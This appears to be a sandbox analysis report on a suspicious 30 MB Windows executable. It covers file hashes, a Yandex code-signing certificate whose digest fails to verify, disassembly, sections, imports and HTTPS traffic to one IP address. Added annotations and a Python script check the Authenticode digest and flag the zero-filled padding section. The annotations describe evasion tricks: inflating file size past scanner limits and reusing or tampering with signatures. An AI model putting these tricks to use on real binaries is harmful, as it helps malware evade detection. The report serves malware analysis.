                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Entropy (8bit):0.1079397912024875
                                    TrID:
                                    • Win64 Executable GUI (202006/5) 92.65%
                                    • Win64 Executable (generic) (12005/4) 5.51%
                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                    • DOS Executable Generic (2002/1) 0.92%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:1387457-38765948.15.exe
                                    File size:30'954'656 bytes
                                    MD5:947cd5df10d540b879c037c1cb519e63
                                    SHA1:8e4f326d08b675c077dc1d19246bac5eaa0f73dc
                                    SHA256:29f92fd013bdfc23e6b1a088f68b7bf4acf423bcc440d0ff49ac0079a38c5072
                                    SHA512:8516a7ff71fdcf2ff6e0210023fec4f064e0b3d3f520938a2259f0701bc69584239f502e0a11d1374cdf436d990b0592bd9c67c117ed7528c57e86c638c9631e
                                    SSDEEP:3072:H4Df3i8mhK5BSHO/3RBFADIDhwhKBE3Ukepa9Z2tH9bPP29NLG/ZWWHdpiQzQ:H4Dfy8neu/3/H9whKBE4eK/ZWW9piQzQ
                                    TLSH:6467281B5350E99DEC31B07CD0008795ABA27C253293FF9A52E07A9EDF721C19D2B627
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................85......85......85..............................QV/.............%.......%.........s.....%.......Rich...........
                                    Icon Hash:1268c4ce68328e40
                                    Entrypoint:0x140004f04
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x140000000
                                    Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE (RELOCS_STRIPPED is set although the file still carries a .reloc section and a 0x640-byte base relocation directory, see the data directory and section tables below)
DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE (DYNAMIC_BASE is absent, so by default the image is mapped at its fixed Imagebase 0x140000000 instead of being randomised, and HIGH_ENTROPY_VA has no effect without DYNAMIC_BASE)
                                    Time Stamp:0x660D9ED0 [Wed Apr 3 18:24:16 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:a960218d8123ac2428e0da4c17ab3175
Signature Valid:false
Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST: the Authenticode digest carried inside the signature does not match the file's current contents, so either the image was modified after the YANDEX LLC signature was produced or the signature block was transplanted from another binary; this is a content-hash mismatch, not a certificate chain or validity-period failure, and the presence of the Yandex subject must not be read as the file being Yandex software)
                                    Not Before, Not After
                                    • 06/05/2022 10:44:54 06/05/2024 10:44:54
                                    Subject Chain
                                    • CN=YANDEX LLC, O=YANDEX LLC, STREET="Leo Tolstoy street, 16", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1027700229193, OID.2.5.4.15=Private Organization
                                    Version:3
                                    Thumbprint MD5:07A79C5F2F79548D1AC45A792866ABD9
                                    Thumbprint SHA-1:F55522C99528A0C94883E56FF946AC088091E573
                                    Thumbprint SHA-256:1561AE150E66F6D2B3BCEDA46D46525EDCAF8697D3BC94485150865DC40EF888
                                    Serial:7904D32E74FC472B66C08A38
Instruction (disassembly at the entry point 0x140004f04; the listing decodes this x86-64 code as 32-bit, so each "dec eax", "inc ecx", "inc ebp" and "dec esp" line is really a REX prefix byte (0x48, 0x41, 0x45, 0x4C) belonging to the instruction that follows it, e.g. "dec eax" followed by "sub esp, 28h" is "sub rsp, 28h", and the 32-bit register names in the prefixed instructions should be read as their 64-bit or r8-r15 counterparts)
                                    dec eax
                                    sub esp, 28h
                                    call 00007FBF0908789Ch
                                    dec eax
                                    add esp, 28h
                                    jmp 00007FBF09083677h
                                    int3
                                    int3
                                    retn 0000h
                                    int3
                                    and dword ptr [00016B45h], 00000000h
                                    ret
                                    dec eax
                                    mov dword ptr [esp+08h], ebx
                                    push ebp
                                    dec eax
                                    lea ebp, dword ptr [esp-000004C0h]
                                    dec eax
                                    sub esp, 000005C0h
                                    mov ebx, ecx
                                    mov ecx, 00000017h
                                    call 00007FBF0909203Dh
                                    test eax, eax
                                    je 00007FBF090874C6h
                                    mov ecx, ebx
                                    int 29h
                                    mov ecx, 00000003h
                                    call 00007FBF0908748Ah
                                    xor edx, edx
                                    dec eax
                                    lea ecx, dword ptr [ebp-10h]
                                    inc ecx
                                    mov eax, 000004D0h
                                    call 00007FBF09087E5Dh
                                    dec eax
                                    lea ecx, dword ptr [ebp-10h]
                                    call dword ptr [0000C08Eh]
                                    dec eax
                                    mov ebx, dword ptr [ebp+000000E8h]
                                    dec eax
                                    lea edx, dword ptr [ebp+000004D8h]
                                    dec eax
                                    mov ecx, ebx
                                    inc ebp
                                    xor eax, eax
                                    call dword ptr [0000C1F4h]
                                    dec eax
                                    test eax, eax
                                    je 00007FBF090874FEh
                                    dec eax
                                    and dword ptr [esp+38h], 00000000h
                                    dec eax
                                    lea ecx, dword ptr [ebp+000004E0h]
                                    dec eax
                                    mov edx, dword ptr [ebp+000004D8h]
                                    dec esp
                                    mov ecx, eax
                                    dec eax
                                    mov dword ptr [esp+30h], ecx
                                    dec esp
                                    mov eax, ebx
                                    dec eax
                                    lea ecx, dword ptr [ebp+000004E8h]
                                    dec eax
                                    mov dword ptr [esp+28h], ecx
                                    dec eax
                                    lea ecx, dword ptr [ebp-10h]
                                    dec eax
                                    mov dword ptr [esp+20h], ecx
                                    xor ecx, ecx
                                    call dword ptr [0000C1BBh]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x19af0 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1d77000 | 0x10400 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1d76000 | 0xe7c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1d82c00 | 0x28a0 | .rsrc (for this entry the address field is the raw file offset of the certificate table, not an RVA; 0x1d82c00 + 0x28a0 is exactly the 30,954,656-byte file size, so the signature block sits at the very end of the file and the section attribution is nominal)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1d88000 | 0x640 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x18740 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x188b0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x187b0 | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x11000 | 0x2e8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xf2dc | 0xf400 | 92151013447fb3f2d89a0eb0689389ef | False | 0.5336353739754098 | data | 6.3728130766478825 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x11000 | 0x94b0 | 0x9600 | b6c5607f532945a497a3dd9ec32e34e8 | False | 0.42380208333333336 | data | 4.7375559254011765 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1b000 | 0x1d5ace4 | 0x1d58200 | 3d87169ee8c7fd21de7968eb5c4a77d1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x1d76000 | 0xe7c | 0x1000 | ebfc7d80ce38e3ab843fa63d2287afdf | False | 0.43701171875 | data | 4.481426700060546 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x1d77000 | 0x10400 | 0x10400 | abe4ac1b8181f9a4987480c9413a557e | False | 0.10115685096153847 | data | 3.008124803901922 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1d88000 | 0x640 | 0x800 | 8a59f1b22252635e9e76e3c3f27b6b51 | False | 0.5537109375 | data | 4.840560734683175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
The .data section alone accounts for 0x1d58200 (30,769,664) of the 30,954,656 file bytes while the whole-file entropy reported above is 0.108, so that section must consist almost entirely of a single repeated byte value. The raw sizes of the six sections plus the 0x400-byte headers add up exactly to the certificate-table offset 0x1d82c00, so nothing else is hidden in the file: real code and data are confined to roughly 185 KB, and the rest is inflation, a common way to push a sample past the size limits of AV engines and upload portals (the tool itself gave up on the section, hence the "unknown" columns).
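Two findings above deserve a reproducible check: the failed signature (Signature Valid: false, Error Number -2146869232) and the .data section that makes up almost the whole 30 MB file while the file-level entropy is 0.108. The script below is an added illustration and is not part of the Joe Sandbox report or of the analysed sample. It builds a small synthetic PE32+ image from constructed section contents, computes the Authenticode digest the way a verifier does (the CheckSum field, the Security directory entry and the certificate table are excluded), shows that one byte changed in section data after signing yields exactly the bad-digest condition the report records while an edit to CheckSum alone still verifies, and flags a dominant near-zero-entropy section. Section names and sizes, the certificate placeholder and the entropy thresholds are assumptions made for the example.

```python
import hashlib
import math
import struct

FILE_ALIGN = 0x200
TRUST_E_BAD_DIGEST = 0x80096010  # "The digital signature of the object did not verify."


def hresult(error_number: int) -> int:
    # The report prints the HRESULT as a signed 32-bit decimal; undo that.
    return error_number & 0xFFFFFFFF


def build_min_pe(sections, cert_blob=b"\x30\x82 stand-in for PKCS#7 SignedData") -> bytes:
    """Minimal PE32+ (x86-64) image from (name, raw bytes) pairs plus an appended
    WIN_CERTIFICATE. Constructed test data, not bytes taken from the analysed sample."""
    hdr_size, raw_off, rva, sect_hdrs, body = FILE_ALIGN, FILE_ALIGN, 0x1000, b"", b""
    for name, data in sections:
        raw_size = len(data) + (-len(data) % FILE_ALIGN)
        sect_hdrs += struct.pack("<8sIIIIIIHHI", name, len(data), rva, raw_size,
                                 raw_off, 0, 0, 0, 0, 0x60000020)
        body += data + b"\x00" * (raw_size - len(data))
        raw_off += raw_size
        rva += raw_size + (-raw_size % 0x1000)
    win_cert = struct.pack("<IHH", 8 + len(cert_blob), 0x0200, 0x0002) + cert_blob
    win_cert += b"\x00" * (-len(win_cert) % 8)
    dirs = [(0, 0)] * 16
    dirs[4] = (raw_off, len(win_cert))  # IMAGE_DIRECTORY_ENTRY_SECURITY: a file offset, not an RVA
    opt = struct.pack("<HBBIIIII", 0x20B, 14, 0, 0, 0, 0, 0x1000, 0x1000)
    opt += struct.pack("<QIIHHHHHHIIII", 0x140000000, 0x1000, FILE_ALIGN,
                       6, 0, 0, 0, 6, 0, 0, rva, hdr_size, 0)  # last field is CheckSum
    opt += struct.pack("<HHQQQQII", 2, 0x8160, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, len(opt), 0x22)
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    headers = dos + b"PE\0\0" + coff + opt + sect_hdrs
    return headers + b"\x00" * (hdr_size - len(headers)) + body + win_cert


def pe_layout(pe: bytes):
    """Return (optional header offset, magic, [(section name, raw offset, raw size)])."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    secs = []
    for i in range(nsec):
        name, _, _, raw_size, raw_off = struct.unpack_from("<8sIIII", pe, opt + opt_size + 40 * i)
        secs.append((name.rstrip(b"\0").decode(), raw_off, raw_size))
    return opt, magic, secs


def authenticode_hash(pe: bytes, algo: str = "sha256") -> str:
    """Hash the image as Authenticode does: skip CheckSum, the Security directory
    entry and the certificate table. Simplified: the spec hashes section data in
    PointerToRawData order, which is file order for the contiguous images built here."""
    opt, magic, _ = pe_layout(pe)
    checksum = opt + 64
    secdir = opt + (144 if magic == 0x20B else 128)  # PE32+ vs PE32
    cert_off, cert_len = struct.unpack_from("<II", pe, secdir)
    h = hashlib.new(algo)
    h.update(pe[:checksum])
    h.update(pe[checksum + 4:secdir])
    if cert_off == 0:  # unsigned image: everything after the directory entry
        h.update(pe[secdir + 8:])
    else:
        h.update(pe[secdir + 8:cert_off])
        h.update(pe[cert_off + cert_len:])  # bytes appended after the cert table are still covered
    return h.hexdigest()


def shannon_entropy(data: bytes) -> float:
    counts, n = [0] * 256, len(data) or 1
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def section_report(pe: bytes, low_entropy: float = 1.0, min_share: float = 0.5) -> dict:
    """Per-section entropy; flag a section that dominates the file yet is nearly one byte value."""
    report = {}
    for name, off, size in pe_layout(pe)[2]:
        ent = shannon_entropy(pe[off:off + size])
        report[name] = {"raw_size": size, "entropy": round(ent, 3),
                        "padding": ent < low_entropy and size / len(pe) >= min_share}
    return report


def demo() -> dict:
    code = bytes(range(256)) * 4  # 1 KiB of varied bytes stands in for .text
    pe = build_min_pe([(b".text", code), (b".data", b"\x00" * 0x8000)])  # 32 KiB zero fill
    signed_digest = authenticode_hash(pe)  # what a signer embeds in the PKCS#7 SpcIndirectDataContent
    tampered = bytearray(pe)
    tampered[FILE_ALIGN + 7] ^= 0xFF  # one byte of .text altered after signing
    cksum_only = bytearray(pe)
    struct.pack_into("<I", cksum_only, 0x40 + 24 + 64, 0xDEADBEEF)  # only CheckSum touched
    return {"tampered_verifies": authenticode_hash(bytes(tampered)) == signed_digest,
            "checksum_change_verifies": authenticode_hash(bytes(cksum_only)) == signed_digest,
            "sections": section_report(pe),
            "error": f"0x{hresult(-2146869232):08X}"}
```

Run demo() to see the three results side by side: the tampered image no longer matches the digest a signer would have embedded (the TRUST_E_BAD_DIGEST situation from the signature block), the CheckSum-only variant still does, and the zero-filled section is flagged as padding. On a real file, a full check also has to parse the PKCS#7 blob and compare the digest it carries; a Windows host does that with Get-AuthenticodeSignature, which reports the same HashMismatch status for this condition.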
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1d77658 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | English | United States | 0.1312588568729334
RT_ICON | 0x1d7b880 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.17022821576763486
RT_ICON | 0x1d7de28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.2171669793621013
RT_ICON | 0x1d7eed0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.35815602836879434
RT_ICON | 0x1d7f378 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | English | United States | 0.1312588568729334
RT_ICON | 0x1d835a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.17022821576763486
RT_ICON | 0x1d85b48 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.2171669793621013
RT_ICON | 0x1d86bf0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.35815602836879434
RT_GROUP_ICON | 0x1d7f338 | 0x3e | data | English | United States | 0.8225806451612904
RT_GROUP_ICON | 0x1d87058 | 0x3e | data | English | United States | 0.8870967741935484
RT_VERSION | 0x1d772b0 | 0x3a4 | data | Russian | Russia | 0.4656652360515021
RT_MANIFEST | 0x1d87098 | 0x365 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (809), with CRLF line terminators | English | United States | 0.4844649021864212
DLL | Import
SHLWAPI.dll | StrCmpIW, StrCatW, StrCpyW, PathAppendW
KERNEL32.dll | RtlCaptureContext, CreateFileW, WriteConsoleW, SetFilePointerEx, GetConsoleMode, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, RaiseException, LoadLibraryW, GetProcAddress, FreeLibrary, GetModuleFileNameW, FindFirstFileW, FindNextFileW, FindClose, DeleteFileW, OpenProcess, WaitForSingleObject, CloseHandle, TerminateProcess, GetCommandLineW, lstrcmpiW, lstrcpyW, ExitProcess, CreateToolhelp32Snapshot, Process32FirstW, GetCurrentProcessId, Thread32First, Thread32Next, Process32NextW, InitializeCriticalSectionEx, GetLastError, DeleteCriticalSection, GetConsoleCP, FlushFileBuffers, GetStringTypeW, SetStdHandle, GetFileType, IsDebuggerPresent, OutputDebugStringW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, CreateEventW, GetModuleHandleW, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, SetLastError, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, GetCurrentProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, GetStdHandle, WriteFile, GetACP, LCMapStringW, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetEnvironmentStringsW, VirtualAlloc
USER32.dll | DispatchMessageW, PostThreadMessageW, CharNextW, GetMessageW
Language of compilation system | Country where language is spoken
English | United States
Russian | Russia
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 12, 2025 04:06:00.724414110 CET | 49981 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:00.724450111 CET | 443 | 49981 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:00.724533081 CET | 49981 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:00.735547066 CET | 49981 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:00.735563993 CET | 443 | 49981 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:01.986825943 CET | 443 | 49981 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:01.986891985 CET | 49981 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:01.987627029 CET | 443 | 49981 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:01.987674952 CET | 49981 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:02.164906979 CET | 49981 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:02.164920092 CET | 443 | 49981 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:02.165213108 CET | 443 | 49981 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:02.165270090 CET | 49981 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:02.167433977 CET | 49981 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:02.211350918 CET | 443 | 49981 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:02.497431040 CET | 443 | 49981 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:02.497611046 CET | 443 | 49981 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:02.497636080 CET | 49981 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:02.497853041 CET | 49981 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:02.513173103 CET | 49981 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:02.513189077 CET | 443 | 49981 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:02.645697117 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:02.645720005 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:02.645817995 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:02.646325111 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:02.646339893 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.055962086 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.056245089 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.056626081 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.056633949 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.056838036 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.056844950 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.400116920 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.400177956 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.400440931 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.400464058 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.400544882 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.400567055 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.400638103 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.401957035 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.402050018 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.406227112 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.406312943 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.490519047 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.490623951 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.490660906 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.490672112 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.490719080 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.490773916 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.490782022 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.490833998 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.490889072 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.490987062 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.491066933 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.491072893 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.491096020 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.491164923 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.492404938 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.492564917 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.494510889 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.494621992 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.494626045 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.494648933 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.494692087 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.494746923 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.496825933 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.496922970 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.619837046 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.619941950 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.620033979 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.620126963 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.620141029 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.620163918 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.620223045 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.620296955 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.620385885 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.620389938 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.620417118 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.620481968 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.620950937 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.621046066 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.621048927 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.621068954 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.621124029 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.621164083 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.621176958 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.621185064 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.621263027 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.621978998 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.622067928 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.622068882 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.622091055 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.622138023 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.622190952 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.622864962 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.622961044 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.622978926 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.623054028 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.623069048 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.623155117 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.623811007 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.623894930 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.623927116 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.624011993 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.624025106 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.624032974 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
